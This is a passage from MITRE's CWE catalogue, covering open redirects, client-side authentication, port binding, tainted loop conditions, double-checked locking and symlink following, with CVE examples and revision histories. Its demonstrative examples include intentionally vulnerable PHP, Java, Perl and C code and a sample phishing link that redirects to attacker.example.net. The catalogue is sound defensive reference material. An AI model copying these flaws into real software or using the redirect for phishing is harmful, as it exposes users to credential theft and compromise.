vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization. + + + + + The following code obtains a URL from the query string and then redirects the user to that URL. + + $redirect_url = $_GET['url'];header("Location: " . $redirect_url); + + The problem with the above code is that an attacker could use this page as part of a phishing scam by redirecting users to a malicious site. For example, assume the above code is in the file example.php. An attacker could supply a user with the following link: + + http://example.com/example.php?url=http://malicious.example.com + + The user sees the link pointing to the original trusted site (example.com) and does not realize the redirection that could take place. + + + The following code is a Java servlet that will receive a GET request with a url parameter in the request to redirect the browser to the address specified in the url parameter. The servlet will retrieve the url parameter value from the request and send a response to redirect the browser to the url address. + + public class RedirectServlet extends HttpServlet { + + protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {String query = request.getQueryString();if (query.contains("url")) {String url = request.getParameter("url");response.sendRedirect(url);}} + } + + The problem with this Java servlet code is that an attacker could use the RedirectServlet as part of a e-mail phishing scam to redirect users to a malicious site. An attacker could send an HTML formatted e-mail directing the user to log into their account by including in the e-mail the following link: + + <a href="http://bank.example.com/redirect?url=http://attacker.example.net">Click here to log in</a> + + The user may assume that the link is safe since the URL starts with their trusted bank, bank.example.com. However, the user will then be redirected to the attacker's web site (attacker.example.net) which the attacker may have made to appear very similar to bank.example.com. The user may then unwittingly enter credentials into the attacker's web page and compromise their bank account. A Java servlet should never redirect a user to a URL without verifying that the redirect address is a trusted site. + + + + + CVE-2005-4206 + URL parameter loads the URL into a frame and causes it to appear to be part of a valid page. + https://www.cve.org/CVERecord?id=CVE-2005-4206 + + + CVE-2008-2951 + An open redirect vulnerability in the search script in the software allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL as a parameter to the proper function. + https://www.cve.org/CVERecord?id=CVE-2008-2951 + + + CVE-2008-2052 + Open redirect vulnerability in the software allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the proper parameter. + https://www.cve.org/CVERecord?id=CVE-2008-2052 + + + CVE-2020-11053 + Chain: Go-based Oauth2 reverse proxy can send the authenticated user to another site at the end of the authentication flow. A redirect URL with HTML-encoded whitespace characters can bypass the validation (CWE-1289) to redirect to a malicious site (CWE-601) + https://www.cve.org/CVERecord?id=CVE-2020-11053 + + + + + 38 + URl Redirector Abuse + + + SFP24 + Tainted input to command + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2007-05-07 + Draft 6 + 2007-05-07 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Alternate_Terms, Background_Details, Description, Detection_Factors, Likelihood_of_Exploit, Name, Relationships, Observed_Example, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-03 + updated References and Observed_Examples + + + CWE Content Team + MITRE + 2008-10-14 + updated Alternate_Terms, Observed_Examples, References + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Name + + + CWE Content Team + MITRE + 2009-12-28 + updated Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-02-16 + updated Applicable_Platforms, Common_Consequences, Detection_Factors, Potential_Mitigations, Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-04-05 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-07-17 + updated References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Description, Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Unsafe URL Redirection + URL Redirection to Untrusted Site + URL Redirection to Untrusted Site (aka 'Open Redirect') + + + + The product is composed of a server that relies on the client to implement a mechanism that is intended to protect the server. + When the server relies on protection mechanisms placed on the client side, an attacker can modify the client-side behavior to bypass the protection mechanisms, resulting in potentially unexpected interactions between the client and server. The consequences will vary, depending on what the mechanisms are trying to protect. + + + + + + + + + Primary + + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + Architecture and Design + Consider a product that consists of two or more processes or nodes that must interact closely, such as a client/server model. If the product uses protection schemes in the client in order to defend from attacks against the server, and the server does not use the same schemes, then an attacker could modify the client in a way that bypasses those schemes. This is a fundamental design flaw that is primary to many weaknesses. + + + Medium + + + Access Control + Availability + Bypass Protection Mechanism + DoS: Crash, Exit, or Restart + Client-side validation checks can be easily bypassed, allowing malformed or unexpected input to pass into the application, potentially as trusted data. This may lead to unexpected states, behaviors and possibly a resulting crash. + + + Access Control + Bypass Protection Mechanism + Gain Privileges or Assume Identity + Client-side checks for authentication can be easily bypassed, allowing clients to escalate their access levels and perform unintended actions. + + + + + Architecture and Design + + For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. + Even though client-side checks provide minimal benefits with respect to server-side security, they are still useful. First, they can support intrusion detection. If the server receives input that should have been rejected by the client, then it may be an indication of an attack. Second, client-side error-checking can provide helpful feedback to the user about the expectations for valid input. Third, there may be a reduction in server-side processing time for accidental input errors, although this is typically a small savings. + + + + Architecture and Design + If some degree of trust is required between the two entities, then use integrity checking and strong authentication to ensure that the inputs are coming from a trusted source. Design the product so that this trust is managed in a centralized fashion, especially if there are complex or numerous communication channels, in order to reduce the risks that the implementer will mistakenly omit a check in a single code path. + + + Testing + Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. + + + Testing + Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. + + + + + This example contains client-side code that checks if the user authenticated successfully before sending a command. The server-side code performs the authentication in one step, and executes the command in a separate step. + CLIENT-SIDE (client.pl) + + $server = "server.example.com";$username = AskForUserName();$password = AskForPassword();$address = AskForAddress();$sock = OpenSocket($server, 1234);writeSocket($sock, "AUTH $username $password\n");$resp = readSocket($sock);if ($resp eq "success") { + + + # username/pass is valid, go ahead and update the info! + writeSocket($sock, "CHANGE-ADDRESS $username $address\n"; + }else {print "ERROR: Invalid Authentication!\n";} + + SERVER-SIDE (server.pl): + + $sock = acceptSocket(1234);($cmd, $args) = ParseClientRequest($sock);if ($cmd eq "AUTH") { + ($username, $pass) = split(/\s+/, $args, 2);$result = AuthenticateUser($username, $pass);writeSocket($sock, "$result\n"); + # does not close the socket on failure; assumes the + + + # user will try again + + + }elsif ($cmd eq "CHANGE-ADDRESS") {if (validateAddress($args)) {$res = UpdateDatabaseRecord($username, "address", $args);writeSocket($sock, "SUCCESS\n");}else {writeSocket($sock, "FAILURE -- address is malformed\n");}} + + The server accepts 2 commands, "AUTH" which authenticates the user, and "CHANGE-ADDRESS" which updates the address field for the username. The client performs the authentication and only sends a CHANGE-ADDRESS for that user if the authentication succeeds. Because the client has already performed the authentication, the server assumes that the username in the CHANGE-ADDRESS is the same as the authenticated user. An attacker could modify the client by removing the code that sends the "AUTH" command and simply executing the CHANGE-ADDRESS. + + + In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. + Multiple vendors used client-side authentication in their OT products. + + + + + CVE-2022-33139 + SCADA system only uses client-side authentication, allowing adversaries to impersonate other users. + https://www.cve.org/CVERecord?id=CVE-2022-33139 + + + CVE-2006-6994 + ASP program allows upload of .asp files by bypassing client-side checks. + https://www.cve.org/CVERecord?id=CVE-2006-6994 + + + CVE-2007-0163 + steganography products embed password information in the carrier file, which can be extracted from a modified client. + https://www.cve.org/CVERecord?id=CVE-2007-0163 + + + CVE-2007-0164 + steganography products embed password information in the carrier file, which can be extracted from a modified client. + https://www.cve.org/CVERecord?id=CVE-2007-0164 + + + CVE-2007-0100 + client allows server to modify client's configuration and overwrite arbitrary files. + https://www.cve.org/CVERecord?id=CVE-2007-0100 + + + + + A1 + Unvalidated Input + CWE More Specific + + + + + + + + + + + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Community + 2007-05-07 + Draft 6 + 2007-05-07 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-01-12 + updated Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Research_Gaps, Time_of_Introduction + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Applicable_Platforms, Common_Consequences, Description + + + CWE Content Team + MITRE + 2010-02-16 + updated References + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-12-13 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, Description, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Relationships, Type + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Client-Side Enforcement of Server-Side Security + Design Principle Violation: Client-Side Enforcement of Server-Side Security + + + + A client/server product performs authentication within client code but not in server code, allowing server-side authentication to be bypassed via a modified client that omits the authentication check. + Client-side authentication is extremely weak and may be breached easily. Any attacker may read the source code and reverse-engineer the authentication mechanism to access parts of the application which would otherwise be protected. + + + + + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + Implementation + + + + + Access Control + Bypass Protection Mechanism + Gain Privileges or Assume Identity + + + + + Architecture and Design + Do not rely on client side data. Always perform server side authentication. + + + + + In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. + Multiple vendors used client-side authentication in their OT products. + + + + + CVE-2022-33139 + SCADA system only uses client-side authentication, allowing adversaries to impersonate other users. + https://www.cve.org/CVERecord?id=CVE-2022-33139 + + + CVE-2006-0230 + Client-side check for a password allows access to a server using crafted XML requests from a modified client. + https://www.cve.org/CVERecord?id=CVE-2006-0230 + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2007-05-07 + Draft 6 + 2007-05-07 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Maintenance_Notes, Other_Notes + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Client-Side Authentication + + + + When multiple sockets are allowed to bind to the same port, other services on that port may be stolen or spoofed. + On most systems, a combination of setting the SO_REUSEADDR socket option, and a call to bind() allows any process to bind to a port to which a previous process has bound with INADDR_ANY. This allows a user to bind to the specific address of a server bound to INADDR_ANY on an unprivileged port, and steal its UDP packets/TCP connection. + + + + + + + Primary + + + + + + + + Implementation + + + Operation + + + + + Confidentiality + Integrity + Read Application Data + Packets from a variety of network services may be stolen or the services spoofed. + + + + + Policy + Restrict server socket address to known local addresses. + + + + + This code binds a server socket to port 21, allowing the server to listen for traffic on that port. + + void bind_socket(void) { + + int server_sockfd;int server_len;struct sockaddr_in server_address; + + /*unlink the socket if already bound to avoid an error when bind() is called*/ + + unlink("server_socket");server_sockfd = socket(AF_INET, SOCK_STREAM, 0); + server_address.sin_family = AF_INET;server_address.sin_port = 21;server_address.sin_addr.s_addr = htonl(INADDR_ANY);server_len = sizeof(struct sockaddr_in); + bind(server_sockfd, (struct sockaddr *) &s1, server_len); + } + + This code may result in two servers binding a socket to same port, thus receiving each other's traffic. This could be used by an attacker to steal packets meant for another process, such as a secure FTP server. + + + + + SFP32 + Multiple binds to the same port + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2007-05-07 + Draft 6 + 2007-05-07 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Enabling_Factors_for_Exploitation, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Description, Enabling_Factors_for_Exploitation, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Weakness_Ordinalities + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Multiple Binds to Same Port + + + + The product does not properly check inputs that are used for loop conditions, potentially leading to a denial of service or other consequences because of excessive looping. + + + + + + + Implementation + + + + + Availability + DoS: Resource Consumption (CPU) + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Do not use user-controlled data for loop conditions. + + + Implementation + Perform input validation. + + + + + The following example demonstrates the weakness. + + void iterate(int n){int i;for (i = 0; i < n; i++){foo();}}void iterateFoo(){unsigned int num;scanf("%u",&num);iterate(num);} + + + + In the following C/C++ example the method processMessageFromSocket() will get a message from a socket, placed into a buffer, and will parse the contents of the buffer into a structure that contains the message length and the message body. A for loop is used to copy the message body into a local character string which will be passed to another method for processing. + + int processMessageFromSocket(int socket) { + int success; + char buffer[BUFFER_SIZE];char message[MESSAGE_SIZE]; + + // get message from socket and store into buffer + + + //Ignoring possibliity that buffer > BUFFER_SIZE + if (getMessage(socket, buffer, BUFFER_SIZE) > 0) { + + + // place contents of the buffer into message structure + ExMessage *msg = recastBuffer(buffer); + + // copy message body into string for processing + int index;for (index = 0; index < msg->msgLength; index++) {message[index] = msg->msgBody[index];}message[index] = '\0'; + + // process message + success = processMessage(message); + }return success; + } + + However, the message length variable from the structure is used as the condition for ending the for loop without validating that the message length variable accurately reflects the length of the message body (CWE-606). This can result in a buffer over-read (CWE-125) by reading from memory beyond the bounds of the buffer if the message length variable indicates a length that is longer than the size of a message body (CWE-130). + + + + + SFP25 + Tainted input to variable + + + ASCSM-CWE-606 + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2007-05-07 + Draft 6 + 2007-05-07 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Demonstrative_Examples, Description, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A public or protected static final field references a mutable object, which allows the object to be changed by malicious code, or accidentally from another package. + + + + + + + + + Implementation + + + + + Integrity + Modify Application Data + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Protect mutable objects by making them private. Restrict access to the getter and setter as well. + + + + + Here, an array (which is inherently mutable) is labeled public static final. + + public static final String[] USER_ROLES; + + + + + + SFP23 + Exposed Data + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2007-05-07 + Draft 6 + 2007-05-07 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + An ActionForm class contains a field that has not been declared private, which can be accessed without using a setter or getter. + + + + + + Primary + + + + + + + + Implementation + + + + + Integrity + Confidentiality + Modify Application Data + Read Application Data + + + + + Implementation + Make all fields private. Use getter to get the value of the field. Setter should be used only by the framework; setting an action form field from other actions is bad practice and should be avoided. + + + + + In the following Java example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for a online business site. The user will enter registration data and through the Struts framework the RegistrationForm bean will maintain the user data. + + public class RegistrationForm extends org.apache.struts.validator.ValidatorForm { + + // variables for registration formpublic String name;public String email;... + public RegistrationForm() {super();}public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {...}... + } + + However, within the RegistrationForm the member variables for the registration form input data are declared public not private. All member variables within a Struts framework ActionForm class must be declared private to prevent the member variables from being modified without using the getter and setter methods. The following example shows the member variables being declared private and getter and setter methods declared for accessing the member variables. + + public class RegistrationForm extends org.apache.struts.validator.ValidatorForm { + + // private variables for registration formprivate String name;private String email;... + public RegistrationForm() {super();} + public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {...} + + + + // getter and setter methods for private variables...} + + + + + + SFP28 + Unexpected access points + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2007-05-07 + Draft 6 + 2007-05-07 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2010-06-21 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses double-checked locking to access a resource without the overhead of explicit synchronization, but the locking is insufficient. + Double-checked locking refers to the situation where a programmer checks to see if a resource has been initialized, grabs a lock, checks again to see if the resource has been initialized, and then performs the initialization if it has not occurred yet. This should not be done, as it is not guaranteed to work in all languages and on all architectures. In summary, other threads may not be operating inside the synchronous block and are not guaranteed to see the operations execute in the same order as they would appear inside the synchronous block. + + + + + + + + + + Implementation + + + + + Integrity + Other + Modify Application Data + Alter Execution Logic + + + + + Implementation + While double-checked locking can be achieved in some languages, it is inherently flawed in Java before 1.5, and cannot be achieved without compromising platform independence. Before Java 1.5, only use of the synchronized keyword is known to work. Beginning in Java 1.5, use of the "volatile" keyword allows double-checked locking to work successfully, although there is some debate as to whether it achieves sufficient performance gains. See references. + + + + + It may seem that the following bit of code achieves thread safety while avoiding unnecessary synchronization... + + if (helper == null) { + synchronized (this) {if (helper == null) {helper = new Helper();}} + }return helper; + + The programmer wants to guarantee that only one Helper() object is ever allocated, but does not want to pay the cost of synchronization every time this code is called. + Suppose that helper is not initialized. Then, thread A sees that helper==null and enters the synchronized block and begins to execute: + + helper = new Helper(); + + If a second thread, thread B, takes over in the middle of this call and helper has not finished running the constructor, then thread B may make calls on helper while its fields hold incorrect values. + + + + + LCK10-J + Do not use incorrect forms of the double-checked locking idiom + + + SFP19 + Missing Lock + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2007-05-07 + Draft 6 + 2007-05-07 + + + Eric Dalci + Cigital + 2008-07-01 + updated Context_Notes + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-01-12 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-12-13 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Double Checked Locking + + + + The product, when opening a file or directory, does not sufficiently account for when the file is a symbolic link that resolves to a target outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files. + A product that allows UNIX symbolic links (symlink) as part of paths whether in internal code or through user input can allow an attacker to spoof the symbolic link and traverse the file system to unintended locations or access arbitrary files. The symbolic link can permit an attacker to read/write/corrupt a file that they originally did not have permissions to access. + + + + + + + + + + Resultant + + + + + + + + Symlink following + + + symlink vulnerability + + + + + Implementation + These are typically reported for temporary files or privileged programs. + + + High + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Implementation + Symbolic link attacks often occur when a program creates a tmp directory that stores files/links. Access to the directory should be restricted to the program as to prevent attackers from manipulating the files. + + + Architecture and Design + Separation of Privilege + + Follow the principle of least privilege when assigning access rights to entities in a software system. + Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted. + + + + + + CVE-1999-1386 + Some versions of Perl follow symbolic links when running with the -e option, which allows local users to overwrite arbitrary files via a symlink attack. + https://www.cve.org/CVERecord?id=CVE-1999-1386 + + + CVE-2000-1178 